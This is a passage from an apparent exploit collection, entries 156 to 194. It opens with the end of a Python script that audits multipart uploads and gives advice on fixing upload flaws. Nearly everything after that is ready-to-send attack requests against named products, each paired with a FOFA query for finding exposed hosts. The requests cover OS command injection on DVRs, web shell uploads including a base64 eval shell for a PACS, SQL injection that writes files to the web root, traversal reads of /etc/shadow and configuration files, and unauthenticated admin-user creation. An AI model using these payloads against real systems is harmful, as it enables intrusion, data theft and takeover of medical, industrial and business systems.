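            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        m = DISPOSITION.search(headers.get("content-disposition", ""))
        parts.append({
            "name": m.group(1) if m else "",
            "filename": m.group(2) if m else None,
            "content_type": headers.get("content-type", ""),
            "data": data.rstrip(b"\r\n"),
        })
    return parts


def upload_findings(part):
    """Reasons this part looks like a web-shell upload (empty list = fine)."""
    reasons = []
    filename = part["filename"]
    if filename is None:
        return reasons
    basename = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Look at every dotted segment, not just the last one: 'x.php.png' is
    # executed by Apache configurations that honour multiple extensions.
    bad = [e for e in basename.lower().split(".")[1:] if e in EXECUTABLE_EXT]
    if bad:
        reasons.append("executable extension ." + bad[0])
    if part["content_type"].startswith("image/") and not part["data"].startswith(IMAGE_MAGIC):
        reasons.append("declared " + part["content_type"] + " without image magic bytes")
    if any(tag in part["data"] for tag in SERVER_TAGS):
        reasons.append("server-side script tag in content")
    return reasons


def audit(body, boundary):
    """[(filename, reasons)] for every uploaded part with at least one finding."""
    out = []
    for part in parse_multipart(body, boundary):
        reasons = upload_findings(part)
        if reasons:
            out.append((part["filename"], reasons))
    return out


# Constructed body modelled on entry 155: a PHP file declared as image/png,
# a genuine PNG header, and a plain field.  The boundary is made up.
SAMPLE_BOUNDARY = "----ExampleBoundary7MA4YWxkTrZu0gW"
SAMPLE_BODY = (
    b"------ExampleBoundary7MA4YWxkTrZu0gW\r\n"
    b'Content-Disposition: form-data; name="file"; filename="test.php"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"<?php phpinfo();unlink(__FILE__);?>\r\n"
    b"------ExampleBoundary7MA4YWxkTrZu0gW\r\n"
    b'Content-Disposition: form-data; name="file"; filename="logo.png"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\r\n"
    b"------ExampleBoundary7MA4YWxkTrZu0gW\r\n"
    b'Content-Disposition: form-data; name="hidwel"\r\n\r\n'
    b"set\r\n"
    b"------ExampleBoundary7MA4YWxkTrZu0gW--\r\n"
)

if __name__ == "__main__":
    for filename, reasons in audit(SAMPLE_BODY, SAMPLE_BOUNDARY):
        print(filename, "->", "; ".join(reasons))
```

The same three checks, run on the server before the file is written, are the fix for this class of bug: reject any executable extension in the name, verify the content against the declared type, and store uploads under a server-generated name outside the web root or in a directory where script execution is disabled. Entry 155 shows why renaming alone is not enough: the file was renamed but kept its .php extension.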
156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected:
· TBK DVR-4104
· TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The decoded mdc value is: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt; and the only "authentication" in the request is the fixed Cookie uid=1.

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-069716
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
